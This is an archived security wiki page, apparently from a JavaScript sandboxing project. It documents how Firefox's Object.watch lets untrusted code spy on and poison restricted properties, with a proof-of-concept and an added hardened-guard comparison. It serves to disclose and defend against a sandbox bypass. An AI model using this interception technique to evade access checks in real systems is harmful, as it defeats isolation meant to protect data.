This repository has been archived by the owner on Feb 2, 2021. It is now read-only.

ObjectWatch

Kevin Reid edited this page Apr 16, 2015 · 1 revision

(legacy summary: watch and unwatch intercept gets and sets to object properties) (legacy labels: Attack-Vector)

Object.watch allows stealing and poisoning of otherwise restricted data

Effect

If static or runtime checks prevent access to certain properties, then on Firefox, malicious code can still access those properties by using Object.watch.

Background

http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Objects:Object:watch defines Object.watch as a property of all JavaScript Objects that allows a client to watch a particular property of a particular Object, receive notifications when it changes, and possibly modify the value that is set.

Assumptions

Object.watch is callable by client code.

Versions

Firefox and possibly others. Not IE.

Example

// Untrusted code need never access private_ directly to observe and
// modify private fields of a mutable object
function untrusted(o) {
  o.watch(
      'private_',
      // The handler receives the watched property's name, then the old and new values
      function (prop, oldval, newval) {
        alert('untrusted got oldval ' + oldval + ' and newval ' + newval);
        return 'poisoned';  // substitute a bogus value
      });
}

// Trusted code
var o = { private_: 'old' };
untrusted(o);
o.private_ = 'new';
alert('private is now ' + o.private_);
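
The following is an added example, not part of the original page or of the project's code. It shows why a runtime check that only refuses private-looking property names is not enough, and what changes when the check also denies `watch` and `unwatch`. `legacyProto.watch` is a constructed stand-in for Firefox's Object.watch so the code runs on engines that lack it; `guard` and `runScenario` are hypothetical names.

```javascript
// Constructed stand-in for Firefox's legacy Object.prototype.watch so the
// example runs on engines without it (assumption: accessor-based emulation).
const legacyProto = {
  watch(prop, handler) {
    let value = this[prop];
    Object.defineProperty(this, prop, {
      configurable: true, enumerable: true,
      get: () => value,
      set: (newval) => { value = handler.call(this, prop, value, newval); },
    });
  },
};

// Hypothetical runtime check: guest code reaches the object only through this
// facade, which refuses names ending in "_" plus any explicitly denied method.
function guard(target, deniedMethods) {
  const check = (name) => {
    if (name.endsWith('_') || deniedMethods.includes(name)) {
      throw new Error('access denied: ' + name);
    }
  };
  return {
    get(name) { check(name); return target[name]; },
    invoke(name, ...args) { check(name); return target[name](...args); },
  };
}

function runScenario(deniedMethods) {
  const o = Object.create(legacyProto);
  o.private_ = 'old';
  const guest = guard(o, deniedMethods);
  const seen = [];
  let blocked = false;
  try {
    guest.invoke('watch', 'private_', (prop, oldval, newval) => {
      seen.push(oldval, newval);
      return 'poisoned';
    });
  } catch (e) {
    blocked = true;
  }
  o.private_ = 'new'; // trusted code writes its own field
  return { blocked, seen, finalValue: o.private_ };
}

const weak = runScenario([]);                       // checks only the "_" suffix
const hardened = runScenario(['watch', 'unwatch']); // also denies the interceptors
console.log({ weak, hardened });
```

In the weak run the guest never names `private_` as a member to read, yet it observes both values and the trusted write ends up stored as `'poisoned'`; in the hardened run the `watch` call is refused and the write goes through unchanged.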